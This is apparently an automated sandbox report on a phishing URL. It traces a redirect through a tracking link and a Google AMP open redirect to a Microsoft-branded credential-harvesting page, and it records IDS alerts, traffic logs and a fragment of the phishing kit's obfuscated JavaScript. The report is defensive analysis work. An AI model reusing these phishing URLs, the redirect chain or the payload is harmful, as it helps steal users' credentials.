Windows Analysis Report
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A

Overview

General Information

Sample URL:https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%
Analysis ID:1501390
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Suricata IDS alerts for network traffic
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:2024-08-29T20:55:50.535852+0200
SID:2857090
Severity:1
Source Port:443
Destination Port:49747
Protocol:TCP
Classtype:Successful Credential Theft Detected

AV Detection

Source: https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Source: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A Matcher: Template: microsoft matched
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2

Networking

Source: Network traffic Suricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.90.176.213:443 -> 192.168.2.4:49747
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: www.google.com to https://canoassuplementos.com.br//////dayo/xljj3/bwzlcmvzqhblby5vbi5jyq==$
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 163.171.128.244
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
  Host: emp.eduyield.com
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET ////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
  Host: google.com.
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
  Host: google.com
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
  Range: bytes=0-2147483646
  User-Agent: Microsoft BITS/7.8
  Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET //////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
  Host: canoassuplementos.com.br
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1
  Host: canoassuplementos.com.br
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A HTTP/1.1
  Host: hdjdsigfhgejw.caririinovacao.com.br
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: document
  Referer: https://canoassuplementos.com.br/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: emp.eduyield.com
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: canoassuplementos.com.br
Source: global traffic DNS traffic detected: DNS query: hdjdsigfhgejw.caririinovacao.com.br
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Thu, 29 Aug 2024 18:55:49 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
Source: chromecache_43.2.dr String found in binary or memory: https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Go
Source: classification engine Classification label: mal64.phis.win@18/4@14/8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
  • Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
  • Privilege Escalation: 1 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
  • Defense Evasion: 1 Process Injection; Rootkit; Obfuscated Files or Information; Binary Padding
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
  • Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
  • Command and Control: 1 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; 3 Ingress Tool Transfer
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Source | Detection | Scanner | Label | Link
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A | 0% | Avira URL Cloud | safe |
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A | 100% | SlashNext | Credential Stealing type: Phishing & Social Engineering |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Go | 0% | Avira URL Cloud | safe |
https://canoassuplementos.com.br/favicon.ico | 0% | Avira URL Cloud | safe |
https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | 0% | Avira URL Cloud | safe |
https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | 0% | Avira URL Cloud | safe |
https://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
canoassuplementos.com.br | 191.252.144.224 | true | false | | unknown
k256-all.gslb.ksyuncdn.com | 125.39.194.1 | true | false | | unknown
google.com | 142.250.181.238 | true | false | | unknown
hdjdsigfhgejw.caririinovacao.com.br | 164.90.176.213 | true | true | | unknown
emp.eduyield.com | 107.23.245.109 | true | false | | unknown
www.google.com | 142.250.185.228 | true | false | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | false | Avira URL Cloud: safe | unknown
https://canoassuplementos.com.br/favicon.ico | false | Avira URL Cloud: safe | unknown
https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | false | | unknown
https://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | false | Avira URL Cloud: safe | unknown
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A | true | | unknown
https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A | false | Avira URL Cloud: safe | unknown
https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Go | chromecache_43.2.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.228 | www.google.com | United States | | 15169 | GOOGLEUS | false
107.23.245.109 | emp.eduyield.com | United States | | 14618 | AMAZON-AESUS | false
191.252.144.224 | canoassuplementos.com.br | Brazil | | 27715 | LocawebServicosdeInternetSABR | false
142.250.185.110 | unknown | United States | | 15169 | GOOGLEUS | false
142.250.181.238 | google.com | United States | | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
164.90.176.213 | hdjdsigfhgejw.caririinovacao.com.br | United States | | 14061 | DIGITALOCEAN-ASNUS | true
IP
192.168.2.4
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1501390
                      Start date and time:2024-08-29 20:54:37 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 17s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal64.phis.win@18/4@14/8
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.186.35, 66.102.1.84, 34.104.35.123, 20.12.23.50, 125.39.194.1, 13.95.31.18, 192.229.221.95, 52.165.164.15, 142.250.185.67
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A
                      No simulations
Input: URL: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A Model: jbxai
Output:
{
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"play",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false
}
No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):315
                      Entropy (8bit):5.0572271090563765
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                      Malicious:false
                      Reputation:low
                      URL:https://canoassuplementos.com.br/favicon.ico
                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65454)
                      Category:downloaded
                      Size (bytes):732642
                      Entropy (8bit):6.200104733107327
                      Encrypted:false
                      SSDEEP:12288:5nFzPCVn3uQcb0NOJhrBnCyAbTlRT1nqZoT2eDKOrj3mji7mbxwu/AXcXh:5FLba8+TlnV6It2ji7E7//h
                      MD5:FD6FB23DCCB4CDC654726A789E7AF4F5
                      SHA1:837C9E06FB28870E724B0A910FAD031E1B479493
                      SHA-256:98FB7661F877207611022E950E45CF182D48C83894A2132C4295671EA43258D5
                      SHA-512:959A5B3F86A87EA8D5410CD82BFEA816D7F1ABD89D06147F3EC4C7E12AD8FCDE8118A3941AFF05AABA430449D83CED179F3EB6637ECAED2FCB47D3D82B77EF69
                      Malicious:false
                      Reputation:low
                      URL:https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A
                      Preview:<!DOCTYPE html>.<html lang="en">. <head>. <script type="text/javascript">. function a0D4(){var dR=['fTfRB','object','MozAppearance','document.F=Object','DateTimeFormat','/npm-monitoring','connection','DIV.agores300','Haettenschweiler','','context','show','ontransitioncancel','unicodeSets','.site-pub-interstitiel','div[class^=\x22app_gdpr\x22]','userAgent','style','.optimonk-iframe-container','IteratorPrototype','kind','[data-cookie-number]','Leelawadee','pageYOffset','TmcZH','KltgM','Undefined','Date','AUuFf','indexOf','chrome','[object\x20Intl]','asin','Marlett','forEach','MutationObserver','#taotaole','canvas','getShaderPrecisionFormat','','.mobile_adhesion','createEvent','iPhone','.alert-info[data-block-track*=\x22CookieNotice\x22]','atanh','Window','EudTZ','.navigate-to-top','','callee','Event','trunc','frequency','multiply','#SidebarIklan-wrapper','a[href*=macau-uta-popup]','reject','BatteryManager','.open.pushModal','sticky','innerHeight','','safari','\x20is\x20not\x20a\x20fun
                      No static file info
                      Timestamp:2024-08-29T20:55:50.535852+0200
                      Protocol:TCP
                      SID:2857090
                      Signature:ETPRO PHISHING JS/PsyduckPockeball Payload Inbound
                      Severity:1
                      Source Port:443
                      Dest Port:49747
                      Source IP:164.90.176.213
                      Dest IP:192.168.2.4
                      Timestamp  Source Port  Dest Port  Source IP  Dest IP
                      Aug 29, 2024 20:55:50.707298994 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.707305908 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707355976 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.707977057 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707993031 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.708046913 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.708054066 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.708082914 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.708098888 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.806579113 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806598902 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806664944 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.806677103 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806725979 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.807365894 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807382107 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807436943 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.807442904 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807482004 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.808070898 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808088064 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808160067 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.808166981 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808208942 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.809029102 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809046030 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809123039 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.809129000 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809171915 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.810029984 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810050011 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810121059 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.810133934 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810175896 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.811158895 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811172009 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811255932 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.811264038 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811454058 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.812165976 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.812242031 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.812242985 CEST44349747164.90.176.213192.168.2.4
